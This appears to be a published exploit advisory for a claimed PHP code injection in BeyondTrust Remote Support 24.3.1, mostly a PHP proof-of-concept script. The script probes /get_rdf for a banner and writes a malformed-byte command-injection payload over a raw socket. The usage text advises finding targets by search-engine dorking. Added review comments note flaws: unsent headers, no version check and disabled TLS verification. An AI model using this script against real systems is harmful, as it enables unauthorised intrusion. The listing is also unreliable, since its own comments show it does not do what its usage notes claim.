BeyondTrust 24.3.1 Code Execution
BeyondTrust 24.3.1 Code Execution
=============================================================================================================================================
| # Title : BeyondTrust v24.3.1 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.beyondtrust.com |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engine.

[+] The code exploits a vulnerability in BeyondTrust Remote Support via WebSocket to execute arbitrary commands on the target system.

[+] save code as poc.php .

[+] Usage : cmd => c:\www\test\php poc.php <URL>

[+] Set target = Line 72

[+] PayLoad :

<?php

/**
 * Proof-of-concept client from the advisory text on this page.
 *
 * Holds a target host, a port, a TLS flag and a fixed payload string, and
 * exposes one HTTP probe (check_vulnerability) and one raw-socket write
 * (exploit). Neither method reads a version number or a reply confirming
 * execution, so the strings they return are not evidence that a host is or
 * is not affected.
 */
class BeyondTrustExploit {
// Host name or IP address the requests are sent to.
private $target;
// TCP port used for both the HTTP probe and the socket connection.
private $port;
// Selects the https/wss scheme over http/ws when URLs are built.
private $use_ssl;
// String interpolated into the last line written by exploit().
private $payload;

/**
 * Stores the connection settings and sets a fixed payload string.
 *
 * @param string $target  Host name or IP address.
 * @param int    $port    TCP port; defaults to 443.
 * @param bool   $use_ssl Whether URLs use the https/wss scheme; defaults to true.
 */
public function __construct($target, $port = 443, $use_ssl = true) {
$this->target = $target;
$this->port = $port;
$this->use_ssl = $use_ssl;
$this->payload = "echo 'Hacked';"; // fixed marker string; the original comment here was lost to a character-encoding error
}

/**
 * Sends a GET request to $path on the target and returns the body.
 *
 * @param string $path   Request path, appended directly after host and port.
 * @param array  $params Query parameters, encoded with http_build_query().
 * @return string|bool   Response body, or false when curl_exec() fails.
 */
private function send_request($path, $params = []) {
$protocol = $this->use_ssl ? 'https' : 'http';
$url = "$protocol://{$this->target}:{$this->port}$path";

$query_string = http_build_query($params);
$full_url = !empty($query_string) ? "$url?$query_string" : $url;

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $full_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Certificate and host-name verification are both disabled, so the peer is
// not authenticated: whatever answers on this address, including an
// intercepting proxy, is treated as the target.
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

// No timeout is set and curl_error() is not consulted; a failure surfaces
// only as a false return value.
$response = curl_exec($ch);
curl_close($ch);

return $response;
}

/**
 * Requests /get_rdf with comp=sdcust and locale_code=en-us and looks for a
 * fixed banner string in the body.
 *
 * The check matches response text only. It reads no version and therefore
 * cannot tell a patched installation from an unpatched one.
 *
 * NOTE(review): requests for this path and parameter pair from unexpected
 * sources may be worth reviewing in web access logs; confirm against the
 * deployment's normal client traffic first.
 *
 * @return string "No Target" when the response is false or empty, "OHH OK"
 *                when the banner is present, otherwise "no".
 */
public function check_vulnerability() {
$response = $this->send_request('/get_rdf', ['comp' => 'sdcust', 'locale_code' => 'en-us']);

if (!$response) {
return "No Target";
}

if (strpos($response, 'Thank you for using BeyondTrust') !== false) {
return "OHH OK";
}
return "no";
}

/**
 * Opens a TCP connection to the target and writes four newline-terminated
 * lines, the last of which embeds $this->payload.
 *
 * No response is read and the fwrite() results are not checked, so the
 * return value reports only that the writes were attempted.
 *
 * @return string " WebSocket" when the connection fails, otherwise "payload".
 */
public function exploit() {
// Assigned here but not referenced again in this method.
$ws_url = ($this->use_ssl ? 'wss' : 'ws') . "://{$this->target}:{$this->port}/nw";

// Also assigned but never sent: nothing below writes these header lines.
$headers = [
"Sec-WebSocket-Protocol: ingredi support desk customer thin",
"X-Ns-Company: TargetCompany",
"Host: {$this->target}"
];

// The connection uses host and port directly, with a 10-second connect timeout.
$wsock = fsockopen($this->target, $this->port, $errno, $errstr, 10);
if (!$wsock) {
return " WebSocket";
}

// Four lines are written in order: "1", a uniqid() value, "0", then the payload line.
fwrite($wsock, "1\n");
fwrite($wsock, uniqid() . "\n");
fwrite($wsock, "0\n");
// In this double-quoted string \xC0 is the single byte 0xC0 and \! stays a
// literal backslash plus '!'; the payload is interpolated before the trailing '#'.
// NOTE(review): 0xC0 on its own is not a complete UTF-8 sequence; presumably
// the issue involves malformed-input handling on the server. Confirm against
// the vendor advisory before drawing conclusions from this listing.
fwrite($wsock, "\xC0'; \! {$this->payload} #\n");

fclose($wsock);
return "payload";
}
}

// Driver: the target is hard-coded to loopback and no command-line argument is read.
$poc = new BeyondTrustExploit('127.0.0.1');

// Print the banner-probe result first, then a newline.
$probeResult = $poc->check_vulnerability();
echo $probeResult, "\n";

// Run the socket write afterwards and print its status string.
$writeResult = $poc->exploit();
echo $writeResult;

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================